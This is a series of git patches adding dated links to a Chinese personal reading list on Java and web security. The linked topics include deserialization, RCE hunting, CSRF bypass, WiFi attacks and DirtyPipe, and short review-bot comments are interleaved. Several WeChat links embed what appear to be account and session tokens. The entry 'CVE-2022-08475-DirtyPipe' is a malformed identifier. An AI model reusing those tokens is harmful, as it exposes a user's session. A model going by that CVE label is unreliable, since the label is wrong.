--- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e763ad3..df3590f 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -222,3 +222,4 @@ + 2022/12/22 [浅析自动绑定漏洞](https://xz.aliyun.com/t/128) [浅析自动绑定漏洞之Spring MVC](https://www.mi1k7ea.com/2020/02/12/%E6%B5%85%E6%9E%90%E8%87%AA%E5%8A%A8%E7%BB%91%E5%AE%9A%E6%BC%8F%E6%B4%9E%E4%B9%8BSpring-MVC/) [Spring MVC Autobinding漏洞实例初窥](https://xz.aliyun.com/t/1089) [Autobinding](https://github.com/Cryin/JavaID/blob/master/JAVA%E5%AE%89%E5%85%A8%E7%BC%96%E7%A0%81%E4%B8%8E%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1.md) **Autobinding漏洞,代码审计的时候可以关注@SessionAttributes,@ModelAttribute注解** + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** From 30ecf7ac2f030fee93742e66a58f64d835b91a5f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Sun, 25 Dec 2022 13:53:42 +0800 Subject: [PATCH 229/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index df3590f..7198c30 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -223,3 +223,4 @@ + 2022/12/22 [渗透必备!文件读取漏洞的后利用姿势](https://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247539336&idx=1&sn=81cd9e896db0dc9febd9f44bfbb1c69c&chksm=f9e335d3ce94bcc5894e9a6309ec200b8761d8eaef611b07c21fffe01459c71b1f4b686486a0&mpshare=1&scene=23&srcid=1222fVGVLCHXZOEVl7ECdKpe&sharer_sharetime=1671640052561&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **/var/lib/mlocate/mlocate.db 文件比较有趣 centos默认有 ubu默认没有.** + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** ++ [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** From ec064e1bd7cdbb212e57845800de22a5a1216c51 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Dec 2022 14:20:43 +0800 Subject: [PATCH 230/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
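Review bot: The added Struts2/Log4j2 detection entry is the only line in this hunk without a `YYYY/MM/DD` prefix; the context lines above it all start with one (`+ 2022/12/23 ...`). Add the date, for example 2022/12/25 to match the Date header of the commit that adds it, so the list keeps one consistent, sortable entry format.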
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7198c30..99c7f33 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -224,3 +224,4 @@ + 2022/12/23 [红队实录系列(三)-WiFi 近源攻击实战](https://mp.weixin.qq.com/s?__biz=MzkzNjM5MDYwNw==&mid=2247483774&idx=1&sn=8808bfa1445f6b516077a1af244b761f&chksm=c29e3bdef5e9b2c89e0b607a08f098fca261228079259472bef46c645d8a83d2e1ed955f9ffe&mpshare=1&scene=23&srcid=1223e1e52DqpkBFnt02jHE7R&sharer_sharetime=1671794034434&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** ++ 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** From b79e592babf114fee514f1524b96ea132485502c Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Mon, 26 Dec 2022 15:34:55 +0800 Subject: [PATCH 231/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 99c7f33..512d727 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -225,3 +225,4 @@ + 2022/12/23 [漫谈 JEP 290](https://xz.aliyun.com/t/10170) **总结的非常好,在weblogic中启动了全局的过滤器那么如果存在一个cve是jndi,能不能通过ldap打本地反序列化的方法去rce?不能!!!因为ldap打本地反序列化需要有一个gadget虽然weblogic中的gadget非常多但是都被黑名单过滤了又因为是全局过滤器所以在ldap这条路也不能用。除非用jndi......就又一直重复了。** + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** ++ 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** From 90a97719fb1a4a01ed329cd3761c7dbecb932d6d Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Tue, 27 Dec 2022 16:40:54 +0800 Subject: [PATCH 232/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 512d727..7c1f657 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -226,3 +226,4 @@ + [网络安全14:Struts2框架下Log4j2漏洞检测方法分析与总结](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484207&idx=1&sn=285b54a79e48db9a05816cab2e6afc27&chksm=c25fcc54f5284542c1b9abe870e0caa9f958f4da90723bd83292deed215c63c705b7b0bbfaff&mpshare=1&scene=23&srcid=1225r9kGcJN5evUgMo6ecUCC&sharer_sharetime=1671942359949&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **自己也find 一些** + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** ++ 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) From 5065bedf5af76a0892d971dcf9555ce75328d45f Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 13:03:35 +0800 Subject: [PATCH 233/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 7c1f657..ff8ff2c 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -227,3 +227,4 @@ + 2022/12/26 [第27篇:CSRF跨站请求伪造漏洞挖掘及绕过校验方法](https://mp.weixin.qq.com/s?__biz=MzkzMjI1NjI3Ng==&mid=2247484515&idx=1&sn=eacea9e2e1636d27a4d122a8c28ca98d&chksm=c25fcb18f528420ee30ed8d48d76add6423c736408ce50f4723b7b4aa8213e7ad7d400c268ea&cur_album_id=2660130833605132289&scene=190#rd) **了解了解** + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) ++ 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** From 03ca852697d7af343d590f5c535fa8b46d08e5ef Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 13:11:58 +0800 Subject: [PATCH 234/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) 
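Review bot: The WeChat URL in the added 2022/12/28 entry still carries the viewer-side query parameters copied from the desktop client (`key`, `uin`, `devicetype`, `version`, `exportkey`, `pass_ticket`), which appear tied to the account and session that opened the article rather than to the article itself. Committing them to a public README publishes those values and makes the link far longer than it needs to be. Trim the query string to the article parameters (`__biz`, `mid`, `idx`, `sn`), or use the short `https://mp.weixin.qq.com/s/<id>` form that other entries in this file already use.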
diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index ff8ff2c..6b0de79 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -228,3 +228,4 @@ + 2022/12/26 [API安全学习笔记](https://xz.aliyun.com/t/11977) [玩转graphQL](https://mp.weixin.qq.com/s/gp2jGrLPllsh5xn7vn9BwQ) **api的安全** + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** ++ 2022/12/28 [Android 远程攻击面——WebView 
攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** From ed5ddcb089a34a498562bef0f1ba67790cfb2d25 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Wed, 28 Dec 2022 19:08:32 +0800 Subject: [PATCH 235/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 1 + 1 file changed, 1 insertion(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index 6b0de79..d230a63 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
@@ -229,3 +229,4 @@ + 2022/12/27 [某厂商数据库审计系统前台RCE挖掘之旅](https://www.sec-in.com/article/2006) [amazon-redshift-jdbc-driver 任意代码执行漏洞](https://www.sec-in.com/article/896) + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** + 2022/12/28 [Android 远程攻击面——WebView 
攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** ++ 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** From 378a2f2e002f3ae1a01fcbc90af3db7533b50752 Mon Sep 17 00:00:00 2001 From: Firebasky <63966847+Firebasky@users.noreply.github.com> Date: Thu, 29 Dec 2022 12:50:12 +0800 Subject: [PATCH 236/332] Update Readme.md --- "java\346\227\245\345\270\270/Readme.md" | 2 ++ 1 file changed, 2 insertions(+) diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index d230a63..49fb0c7 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" 
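Review bot: The link text `CVE-2022-08475-DirtyPipe` in the added line does not look like a well-formed CVE identifier, since a five-digit sequence number would not begin with 0. Check the ID against the linked article and correct the link text; as written, a search of this list for the real identifier will miss the entry.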
@@ -230,3 +230,5 @@ + 2022/12/28 [溯源实例-从OA到某信源RCE全0day渗透](https://mp.weixin.qq.com/s?__biz=Mzg5OTY2NjUxMw==&mid=2247502698&idx=1&sn=5bfb3124ea5e6dde0f75a16dcc0281c7&chksm=c04d4c54f73ac54284ab70eb074cca632f177ce7af61440cf6a9a47ac17b01ad9a105d6b14e0&subscene=236&key=65a52f471bc41d13b06f820a346368bbb4e4f5342b20850e7a77c8224a338af9d3257d5f4d1f771946ff2bde8a2de3838ef166f262aa3a96f7cae7c3b2581ca8a81e130ac03a98e20269c21b3c4388ce02a40367460b5486fa035d58e7973f7e0119cab28b07861b0c03315d5c1285da188ec1b0bfbe37e35ee05af34397a18e&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQp5liK4%2FGWZqVL2Un7OelRxLgAQIE97dBBAEAAAAAAG3xIKrEpowAAAAOpnltbLcz9gKNyK89dVj01MV50uZ2yoWxvdVPBS6nWl9mhSxXxZU6TC1EzeR8twNAtjlPlR%2BlkVNUUWtnUyuEkRgAsssOTDpaTQW1DGrprZEvTAgVXo3NoSI2Wz%2F9eScz2ACkvqF2rDsjp7WCVYF2Hl06xyJpJrlMNtn8AFjdPRh2352Y5klVxQ7BEtppP0ymCCSvNXigWUp5r1efdCEt6C7IMr12jsU4QaBGzmIASwIwdPunj6oeyeww%2B27Awg4kpvYKMBxgCZR9&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCXlPlkLM%2FrS4cixsrs5q4hv2Q3obpsbuOUcPLpKfDhtHA%3D%3D&wx_header=1&fontgear=2) **不错** + 2022/12/28 [Android 远程攻击面——WebView 
攻防](https://mp.weixin.qq.com/s?__biz=MzI0Njg4NzE3MQ==&mid=2247490611&idx=1&sn=837678e428d46cddf588c8d6fc8b7dfd&chksm=e9b93a5fdeceb349357bd2cdb290ae1c31e8e63b8f3c793ee24780fb5af9b68f95812ead9f13&subscene=236&key=fe7e74d3eacd7a65828a0ce0e318fdea2e2ccd9e009a21e3e4624d8991854c06c5b6cae849bc9e4e44533463ae99a2c32dc7b3d3d085a0504aa762fdf7d10e650e04f312a4af452e290c74eb09aa3b920b4d755383b4656815d50939776dae2b1a3708ed2dc80b61f0cb947562edf2c404fdbf88353b3da1a1ce7c0bb1e146b5&ascene=7&uin=ODYyODE3NzI1&devicetype=Windows+10+x64&version=6308011a&lang=zh_CN&exportkey=n_ChQIAhIQkmMc3S%2BR4POkBz6WNBhgzhLgAQIE97dBBAEAAAAAAEt1Ay0JAV0AAAAOpnltbLcz9gKNyK89dVj0%2FvvQaNijZxhY4D5kpMxru76EYhQ6ux%2BmNJ7Yb0mAhoiwczAd6gUnkS6geo44uTYsLTCJdvSqGoJm%2BSlQc7QOaLOYE7M4J2tjl7BZZd1SDJly%2BY2r5Z%2FYGl80IKiMXYWDnQW8ghg2yu5p9x%2FqI7W0SMnmoSXYuSbFfwfBjlYDoTdQvk3PQ1qnRsRkwmFqr335CD7pLQeFal3FiaJ3JYIC%2BC8Rk6r9DGhatU5IRLe8o2EevyG35KnmpqW8&acctmode=0&pass_ticket=BZXHTJB745OK74KYAukYaeZngdGnH8T2IaWh7T7wSCU9NSOr5Ca%2Bl68ysc6dTAsgsjjNjYJt%2BpYHw6rW7dB9ag%3D%3D&wx_header=1&fontgear=2) **之后说不定遇到学习** + 2022/12/28 [CVE-2022-08475-DirtyPipe](https://mp.weixin.qq.com/s/irugqDGx3OdZylcSGlMfZg) **学习** ++ 2022/12/29 [SpringBoot 过滤器、拦截器、监听器对比及使用场景](https://mp.weixin.qq.com/s?__biz=MzU4MDUyMDQyNQ==&mid=2247512806&idx=1&sn=318c6db2e1d16c5d9521ce9b9a2fb2ac&chksm=fd576260ca20eb76728e35c1f117aa1d061c1bb018bed5f9395ca8bb44aa86acae73d0320371&mpshare=1&scene=23&srcid=122980IZlDnN4Gzh8Mca6QxM&sharer_sharetime=1672286098025&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) ++ 2022/12/29 [看图识WAF-搜集常见WAF拦截页面](https://mp.weixin.qq.com/s?__biz=MzU1NjgzOTAyMg==&mid=2247505571&idx=2&sn=455e76881cf5f069527c3ca6848093fe&chksm=fc3c6fa2cb4be6b4f6aaa14d3d927daa243ea5097f380f85feab844eb617a5d720372275fedb&mpshare=1&scene=23&srcid=1229yAzgrWljKcryXoK9hoVh&sharer_sharetime=1672281327599&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) **收集学习** From 915aa84993cf6fa5b3aa5a9818e93b468b7b008f Mon Sep 17 00:00:00 2001 
